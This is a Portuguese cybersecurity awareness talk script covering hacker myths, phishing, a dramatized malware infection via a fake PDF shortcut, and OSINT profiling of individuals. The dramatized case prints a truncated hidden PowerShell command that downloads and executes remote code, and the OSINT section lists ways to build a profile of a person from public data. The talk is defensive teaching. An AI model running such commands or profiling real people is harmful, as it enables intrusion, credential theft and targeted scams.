# Cybersegurança na prática: onde realmente os sistemas quebram ## Parte 0 — Olá Olá. Meu nome é Álvaro. Alguns me conhecem como **Russo Incendiário**. ![sim, eu realmente cuspo fogo](../Anexos/Pasted%20image%2020260222135117.png) Prometo que hoje eu não vou incendiar nada. Eu gosto muito de três coisas: - Ciência - Tecnologia - E entender como as coisas funcionam Especialmente quando elas quebram. E é exatamente disso que a gente vai falar hoje. # Parte 1 — Quebrando o mito > *beep boop* — "We're in." Todo mundo já viu algum hacker na cultura popular. Tela preta com código subindo. Um cara de capuz digitando freneticamente. Três telas. Cybersegurança não é isso. ![Criador do The Pirate Bay](https://external-preview.redd.it/XkHyIuCd6WzCqkC5EjdVddz8kgJOO0O2S386ilGiXwM.jpg?auto=webp&s=e6e743f2c7c1701dbf285925591ac9695ac33b49) Viram só, ele não usa capuz. Hackers não “adivinham senha”. Não é força bruta cinematográfica. Não é mágica. Não é genialidade sobre-humana. É engenharia. É entender como um sistema funciona — melhor do que quem construiu. --- Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona. Como os pinos se alinham. Como a mola responde. Onde está a tensão. Um chaveiro sabe abrir um cadeado sem a chave. Não porque ele é mágico. Mas porque ele entende o mecanismo. Ser hacker é isso. --- ### Exercício mental Eu quero invadir sua casa. Quem eu chamo? 1. Um ladrão profissional. 2. Ou o chaveiro da esquina? O ladrão talvez quebre a porta. Faça barulho. Chame atenção. O chaveiro? Ele abre. Sem quebrar nada. Sem alarme. Sem ninguém perceber. Hackear é ser o chaveiro. Não é destruir o sistema. É manipulá-lo. --- E aqui está o ponto importante: A maioria dos sistemas não é invadida porque alguém foi brilhante. É invadida porque alguém deixou um parafuso solto. Cybersegurança não é sobre impedir o impossível. É sobre revisar cada engrenagem antes que alguém curioso resolva entender como ela funciona. # Parte 2 — O Maior Vetor de Ataque Não É Técnico > “É mais fácil convencer alguém a abrir a porta do que arrombar a porta.” Se você quer proteger um sistema, precisa aceitar uma coisa desconfortável: Humanos são parte do sistema. E humanos são previsíveis. Coloque isso na sua cabeça: - Usuários são superfície de ataque. - Confiança é explorável. - Pressa é explorável. - Autoridade é explorável. - Curiosidade é explorável. - Medo é explorável. Phishing funciona não porque as pessoas são burras. Mas porque ele parece legítimo. Ele imita: - Linguagem - Layout - Urgência - Contexto Ele explora algo que já existe: confiança. --- ### Exercício mental O que é mais fácil fazer para conseguir seus dados bancários? 1. Hackear a infraestrutura do Nubank? Invadir datacenter. Quebrar criptografia. Burlar monitoramento. Fugir de auditoria. Não deixar log. Ou... 2. Criar um site dizendo: “Descubra qual jogador do Real Madrid você seria” e pedir seus dados para “confirmar identidade”? Qual dos dois exige mais engenharia? Qual dos dois dá menos trabalho? Qual dos dois é menos arriscado? Ou vamos pensar menos. O que é mais fácil fazer para conseguir sua senha da Steam? Você provavelmente duvidaria do seu primo com WhatsApp novo pedindo 100 reais para pagar uma conta. Mas você duvidaria tanto assim se ele estivesse pedindo sua conta na Steam emprestada para jogar Terraria? --- A maioria dos ataques não acontece porque alguém invadiu o banco. Acontece porque alguém clicou. Porque alguém confiou. Porque alguém estava com pressa. Porque parecia normal. --- E aqui está a parte importante para vocês como programadores: Quando você constrói um sistema, você não está protegendo só código. Você está protegendo pessoas. E pessoas: - reutilizam senha, - clicam sem ler, - ignoram alerta, - acreditam em urgência. O atacante sabe disso. Ele não começa pelo firewall. Ele começa pelo comportamento. --- Segurança não começa na criptografia. Começa na cultura. --- ## Parte 3: Exemplo de caso real ## Dramatizado Uberlândia, 14h37. O CEO de uma empresa local está no escritório. Reuniões pela manhã. Planilhas abertas. WhatsApp Web piscando. Ar-condicionado fraco — ele comenta com alguém da equipe. No meio disso, ele confere os e-mails. Assunto: "Nota Fiscal – Fornecedor Atlas Comercial LTDA" Nada estranho. A empresa realmente tem fornecedores. O layout do e-mail parece normal. Assinatura, CNPJ, telefone. Tudo plausível. Ele abre. Anexo: nf-210230120310240102.zip Ele extrai. Dentro: nf-210230120310240102.pdf Ícone de PDF. Nome de PDF. Extensão de PDF. Ele dá dois cliques. Por menos de um segundo, uma janela preta pisca na tela. Ele nem percebe. Acredita que o arquivo corrompeu. Fecha. Volta para o trabalho. O que ele não viu: O arquivo não era um PDF. Era um atalho disfarçado. Um pequeno script. Algo equivalente a: powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression" Em português simples: “Baixe código da internet. Execute. Não mostre nada.” Em menos de 3 segundos: - Um agente é instalado. - A máquina estabelece conexão reversa. - Um servidor externo agora pode enviar comandos. - A sessão está ativa. Não houve: - Exploit sofisticado. - Zero-day. - Quebra de criptografia. - Força bruta. Só um clique. Nos dias seguintes: - Credenciais salvas no navegador são extraídas. - Tokens de sessão são copiados. - Acesso ao sistema interno é mapeado. - Pastas compartilhadas são indexadas. - E-mails são lidos. - Dados de clientes são copiados silenciosamente. Nada trava. Nada quebra. Nada avisa. Sem ransomware. Sem tela vermelha. Sem pedido de resgate. Só coleta. Meses depois, a empresa descobre que seus dados estão sendo usados para aplicar golpes em seus próprios clientes. A pergunta não é: “Como invadiram?” A pergunta é: Onde estava o parafuso solto? ## Parte 4: Conheça seu alvo — na prática Eu quero mostrar como isso funciona de verdade. Nada de ferramenta hacker. Nada de terminal. Nada ilegal. Só internet. --- ### Experimento ao vivo Pegue seu celular. Pense em você mesmo. Agora imagine que eu quero montar um perfil seu sem nunca ter falado com você. O que eu faria? Primeiro: Google. - Seu nome completo - Seu nome + cidade - Seu nome + faculdade - Seu nome + CNPJ - Seu nome entre aspas Às vezes, só isso já revela muito. --- ### Redes sociais Instagram. LinkedIn. Facebook. Perguntas que um atacante faz: - Onde essa pessoa trabalha? - Em que área? - Com quem ela trabalha? - Ela posta foto do escritório? - O crachá aparece? - A tela do computador aparece no fundo? - O Wi-Fi aparece no story? - Tem geolocalização ativada? Uma foto inocente pode revelar: - Nome da empresa - Sistema usado - Layout interno - Marca do roteador - Modelo do notebook - Endereço aproximado --- ### PDFs públicos Agora algo que quase ninguém pensa. Empresas publicam: - Editais - Relatórios - Contratos - Notas técnicas - Apresentações Você baixa o PDF. Abre as propriedades. E lá está: - Nome do autor - Nome do computador - Usuário do sistema - Versão do software - Às vezes até caminho de diretório interno Exemplo fictício: C:\Users\financeiro\Desktop\ContratoClienteVIP.docx Pronto. Você já sabe que existe um usuário chamado "financeiro". --- ### Vazamentos públicos Existem bases de dados antigas que já vazaram: - E-mails - Senhas reutilizadas - Telefones - CPFs Se alguém reutiliza senha, o ataque nem começa do zero. Começa reaproveitando erro antigo. --- ### Caso real (o meu próprio nome) Se alguém pesquisar meu nome completo, vai descobrir: - Que eu tenho uma empresa registrada - O nome fantasia - A cidade - Área de atuação - Dados públicos empresariais - Registros acadêmicos - Registros jurídicos Nada disso foi hackeado. São dados públicos. Mas organizados, viram inteligência. --- ### E agora a pergunta desconfortável: Se eu sei: - Onde você estuda - Onde você trabalha - Seu e-mail padrão - Seu cargo - Seus colegas - Seu telefone Eu preciso invadir seu computador? Ou eu posso mandar um e-mail convincente dizendo ser do RH, do financeiro, ou do suporte técnico? --- OSINT não é invasão. É montar o quebra-cabeça com peças que você mesmo deixou expostas. --- A maioria dos ataques sofisticados começa com algo extremamente simples: Curiosidade. Paciência. E informação pública. ## Encerramento ## Antes das perguntas… Tudo que eu falei aqui hoje não veio de livro. Veio de casos reais. Alguns que eu estudei. Alguns que eu encontrei. Alguns que eu explorei de forma controlada. Outros que eu ajudei a corrigir. Por exemplo: - Um RPG online onde era possível teleportar itens através de abuso de criptografia insegura. - Um sistema de controle de acesso de condomínio cuja API retornava credenciais de rede que jamais deveriam sair do servidor. - Um simulador de vendas de uma fornecedora de diesel vulnerável a SQL Injection. - Um CEO que perdeu o controle da própria máquina por abrir uma “nota fiscal” que não era exatamente um PDF. - Um servidor da Universidade Federal de Uberlândia comprometido através de uma falha no sistema de correção de trabalhos. Nenhum desses casos envolveu magia. Nenhum envolveu supercomputadores. Todos envolveram: confiança mal colocada, validação mal feita, ou arquitetura mal pensada. Cybersegurança não é sobre hackers geniais. É sobre sistemas previsíveis. ## Contato Se quiser continuar essa conversa, tirar dúvidas, ou só trocar ideia sobre tecnologia e segurança: 🌐 **Site profissional** https://cybersun.tec.br/ 📝 **Blog pessoal** https://kasparyan.tec.br 💻 **GitHub** https://github.com/Wiredista 🎥 **YouTube** https://youtube.com/@RussoIncendiario **🧾 Roteiro da palestra:** https://gitea.h4t.eti.br/kasparyan/caderno-virtual/src/branch/main/Palestras/Cyberseguran%C3%A7a%20na%20pr%C3%A1tica.md ![](../Pasted%20image%2020260222143514.png)